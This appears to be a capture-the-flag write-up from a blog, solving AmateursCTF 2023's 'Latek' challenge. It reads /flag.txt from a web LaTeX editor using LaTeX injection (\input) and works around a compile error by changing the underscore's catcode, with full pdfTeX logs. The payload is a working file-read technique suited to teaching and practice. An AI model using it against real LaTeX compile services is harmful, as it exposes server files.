DANARCHERHACKING

Latek

Feature Image

Latek

  • Platform: AmateursCTF
  • Event: AmateursCTF 2023

Challenge Setting

The challenges context is as follows:

bryanguo (not associated with the ctf), keeps saying it's pronouced latek not latex like the glove material. anyways i made this simple app so he stops paying for overleaf.

Overleaf is a popular LaTeX editor. Probably with less security issues too.

Let's try to find this LaTeX editors vulnerability, and convice Bryanguo to invest in a secure LaTeX editor!

Process

In the challenge description, we are told that /flag.txt is the only place we can find the flag.

Let's try using a LaTeX payload to read the contents of the file.

You can find a bunch of LaTeX payloads in the PayloadsAllTheThings repository.

In this case, we use the \input{/some/file.txt}.

The full code entered into the LaTeX editor is as follows.

\documentclass{article}

\begin{document}


\input{/flag.txt}


\end{document}

In this editor, we can conveniently see the logs right below the pdf preview pane.

After entering the above LaTeX code into the editor, this is the output for the logs that we get.

This is pdfTeX, Version 3.141592653-2.6-1.40.25 (TeX Live 2023) (preloaded format=pdflatex 2023.5.17)  19 JUL 2023 19:02  
entering extended mode  
 %&-line parsing enabled.  
**/app/inputs/RjJJtp0ndp01WEnF.tex  
(/app/inputs/RjJJtp0ndp01WEnF.tex  
LaTeX2e <2022-11-01> patch level 1  
L3 programming layer <2023-05-15>  
(/usr/local/texlive/2023/texmf-dist/tex/latex/base/article.cls  
Document Class: article 2022/07/02 v1.4n Standard LaTeX document class  
(/usr/local/texlive/2023/texmf-dist/tex/latex/base/size10.clo  
File: size10.clo 2022/07/02 v1.4n Standard LaTeX file (size option)  
)  
\c@part=\count185  
\c@section=\count186  
\c@subsection=\count187  
\c@subsubsection=\count188  
\c@paragraph=\count189  
\c@subparagraph=\count190  
\c@figure=\count191  
\c@table=\count192  
\abovecaptionskip=\skip48  
\belowcaptionskip=\skip49  
\bibindent=\dimen140  
)  
(/usr/local/texlive/2023/texmf-dist/tex/latex/l3backend/l3backend-pdftex.def  
File: l3backend-pdftex.def 2023-04-19 L3 backend support: PDF output (pdfTeX)  
\l__color_backend_stack_int=\count193  
\l__pdf_internal_box=\box51  
)  
No file RjJJtp0ndp01WEnF.aux.  
\openout1 = `RjJJtp0ndp01WEnF.aux'.  
  
LaTeX Font Info:    Checking defaults for OML/cmm/m/it on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for OMS/cmsy/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for OT1/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for T1/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for TS1/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for OMX/cmex/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for U/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
(/flag.txt  
! Missing $ inserted.  
<inserted text>   
                $  
l.1 amateursCTF{th3_  
                    l0w_budg3t_and_n0_1nstanc3ing_caus3d_us_t0_n0t_all0w_rc3...  
  
?   
! Emergency stop.  
<inserted text>   
                $  

l.1 amateursCTF{th3_  

                    l0w_budg3t_and_n0_1nstanc3ing_caus3d_us_t0_n0t_all0w_rc3...  

End of file on the terminal!  
  
   
Here is how much of TeX's memory you used:  
 431 strings out of 478057  
 8367 string characters out of 5840085  
 1850851 words of memory out of 5000000  
 20640 multiletter control sequences out of 15000+600000  
 512287 words of font info for 32 fonts, out of 8000000 for 9000  
 14 hyphenation exceptions out of 8191  
 34i,0n,38p,151b,36s stack positions out of 10000i,1000n,20000p,200000b,200000s  
!  ==> Fatal error occurred, no output PDF file produced!

You can see that we have almost got the flag with just a simple payload injection.

But there seems to be an error that is stopping us from getting the entire flag.

We can see this error in the logs, and also the pdf preview is not loading.

LaTeX editor showing partial flag

The LaTeX error provided in the logs indicates that there is an issue with math mode in the document. The error message specifically states:

! Missing $ inserted.
<inserted text>
                $
l.1 amateursCTF{th3_
                    l0w_budg3t_and_n0_1nstanc3ing_caus3d_us_t0_n0t_all0w_rc3...

This error occurs when you try to use math symbols or math-related commands without entering math mode.

In LaTeX, you need to enter math mode to use special math symbols, equations, or related commands. Math mode is typically entered using either single dollar signs $ ... $ for inline math mode or double dollar signs $$ ... $$ for displayed math mode.

It seems like it thinks we are trying to use math mode, but the math delimiters (`$`) are missing, and the error message is pointing to the line where the issue is located.

One thing we could try is to change the category code of some of these special math mode control characters to normal characters.

After trying to essentially deactivate these control characters ($#_&) I found that the underscore control character (_) was the issue.

Therefore, we can add \catcode `\_=12 to the LaTeX code!

\documentclass{article}

\begin{document}


\catcode `\_=12


\input{/flag.txt}

\end{document}

In LaTeX, the command \catcode is used to change the category code of a character.

The category code of a character determines how LaTeX treats that character when it appears in the document.

For example, the category code of the underscore character (_) is typically set to 8, which means it is treated as a subscript character in math mode.

\catcode `\_=12 changes the category code of the underscore character (_) to 12.

In TeX (the underlying typesetting engine of LaTeX), category code 12 means that the character is treated as an "other" character, similar to regular alphanumeric characters.

By setting the underscore's category code to 12, it becomes a regular character and can be used in normal text mode without causing any issues or errors.

Now the error disappears and we get the full flag!

This is pdfTeX, Version 3.141592653-2.6-1.40.25 (TeX Live 2023) (preloaded format=pdflatex 2023.5.17)  19 JUL 2023 19:03  
entering extended mode  
 %&-line parsing enabled.  
**/app/inputs/_GKLKhr0r9E2VfxQ.tex  
(/app/inputs/_GKLKhr0r9E2VfxQ.tex  
LaTeX2e <2022-11-01> patch level 1  
L3 programming layer <2023-05-15>  
(/usr/local/texlive/2023/texmf-dist/tex/latex/base/article.cls  
Document Class: article 2022/07/02 v1.4n Standard LaTeX document class  
(/usr/local/texlive/2023/texmf-dist/tex/latex/base/size10.clo  
File: size10.clo 2022/07/02 v1.4n Standard LaTeX file (size option)  
)  
\c@part=\count185  
\c@section=\count186  
\c@subsection=\count187  
\c@subsubsection=\count188  
\c@paragraph=\count189  
\c@subparagraph=\count190  
\c@figure=\count191  
\c@table=\count192  
\abovecaptionskip=\skip48  
\belowcaptionskip=\skip49  
\bibindent=\dimen140  
)  
(/usr/local/texlive/2023/texmf-dist/tex/latex/l3backend/l3backend-pdftex.def  
File: l3backend-pdftex.def 2023-04-19 L3 backend support: PDF output (pdfTeX)  
\l__color_backend_stack_int=\count193  
\l__pdf_internal_box=\box51  
)  
No file _GKLKhr0r9E2VfxQ.aux.  
\openout1 = `_GKLKhr0r9E2VfxQ.aux'.  
  
LaTeX Font Info:    Checking defaults for OML/cmm/m/it on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for OMS/cmsy/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for OT1/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for T1/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for TS1/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for OMX/cmex/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
LaTeX Font Info:    Checking defaults for U/cmr/m/n on input line 3.  
LaTeX Font Info:    ... okay on input line 3.  
(/flag.txt)  
Overfull \hbox (23.80644pt too wide) in paragraph at lines 1--8  

[]\OT1/cmr/m/n/10 amateursCTFth3_l0w_budg3t_and_n0_1nstanc3ing_caus3d_us_t0_n0t  

_all0w_rc3_yeh_im_not_giving_you_the_real_flag  

 []  
  
  
Underfull \hbox (badness 10000) in paragraph at lines 1--8  
  
 []  
  
[1  
  
{/usr/local/texlive/2023/texmf-var/fonts/map/pdftex/updmap/pdftex.map}]  
(/app/documents/_GKLKhr0r9E2VfxQ.aux) )   
Here is how much of TeX's memory you used:  
 435 strings out of 478057  
 8482 string characters out of 5840085  
 1850851 words of memory out of 5000000  
 20640 multiletter control sequences out of 15000+600000  
 512287 words of font info for 32 fonts, out of 8000000 for 9000  
 14 hyphenation exceptions out of 8191  
 34i,5n,38p,151b,107s stack positions out of 10000i,1000n,20000p,200000b,200000s  
</usr/local/texlive/2023/texmf-dist/font  
s/type1/public/amsfonts/cm/cmr10.pfb>  
Output written on /app/documents/_GKLKhr0r9E2VfxQ.pdf (1 page, 15970 bytes).  
PDF statistics:  
 13 PDF objects out of 1000 (max. 8388607)  
 7 compressed objects within 1 object stream  
 0 named destinations out of 1000 (max. 500000)  
 1 words of extra memory for PDF output out of 10000 (max. 10000000)
LaTeX editor showing full flag